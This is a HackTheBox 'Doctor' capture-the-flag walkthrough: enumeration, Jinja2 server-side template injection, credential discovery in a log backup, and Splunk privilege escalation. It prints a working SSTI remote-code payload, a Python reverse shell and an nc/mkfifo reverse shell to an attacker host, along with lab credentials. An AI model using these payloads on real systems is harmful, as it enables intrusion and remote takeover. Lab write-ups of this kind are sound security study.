HackTheBox: (“Doctor”) — Walkthrough
Hi People :D
Today we’ll solve “Doctor” machine from HackTheBox, let’s get started
You can find all commands here
Enumeration
— — — — — — —
Start with Nmap
nmap -A 10.10.10.209
We have port 22, 80 and 8098
Web Enumeration
— — — — — — — —
Let’s check the website
http://10.10.10.209
I tried fuzzing this website using dirsearch but I didn’t find anything useful, after some research I found another domain (“doctors.htb”). so I added this domain in /etc/hosts file
Now let’s check this domain
Nice, we got a login page. Let’s make a new account
Log in with your credentials
It’s a blank page, so let’s try to make a New Message with a simple h1 tag
I didn’t know what is the use of this message until I used dirsearch and found archive file
./dirsearch -u http://doctors.htb/ -e “*” -x 404,403,500,501
When I visited archive I found that it’s a blank page
But, when I checked the source code I found that my message reflected in it
Cool, let’s change this message a bit to print HI in archive
</title></item><h1>HI</h1>
We successfully executed our payload and confirmed that there was a Server-Side Template Injection (SSTI) bug, ( you can read more about it here )
Now let’s try to make a simple test for SSTI using jinja2 injection
Modify our message again
</title></item>{{7*’7’}}
Go back to archive and our payload executed successfully
It’s time for a final exploit :D
Exploitation
— — — — — —
Go back to GitHub page, there is RCE exploit using this bug
So, let’s modify this payload then modify our message to get a shell
</title></item>{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__[’__import__’](’os’).popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{Your_IP}\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);’").read().zfill(417)}}{%endif%}{% endfor %}
Visit archive again and finally, we got a shell as web user :D
User Flag
— — — —
After some files enumeration, I found backup file in /var/log/apache2 that contain password
cat /var/log/apache2/backup | grep pass
I did some enumeration again and found Shaun user, tried this password with him and we got Shaun user
Simply, do some improvements to your shell ( optional ) then read user.txt in home directory :D
Root Flag
— — — —
It’s time to privilege escalation
First, upload LinPEAS to the machine then run it
Leave the script finishes its work then see the results, you will see Splunk user
I searched for Splunk and found this article, then I tried to find any public privilege escalation exploit. fortunately, I found this GitHub repo
We gonna use PySplunkWhisperer2_remote.py
After downloading it, I tried using a simple Netcat reverse shell command as a payload but it didn’t work so I searched for another command and found this awesome website
Using this command as a payload we successfully get our root shell.
The final command looks like that:
python3 PySplunkWhisperer2_remote.py --lhost {Your_IP} --host 10.10.10.209 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {Your_IP} 4444 >/tmp/f'
Very nice, the last step is to read root.txt, but I always like to do some improvements to my shell first with these commands:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux
Thanks for your reading and I hope you love this simple writeup ❤
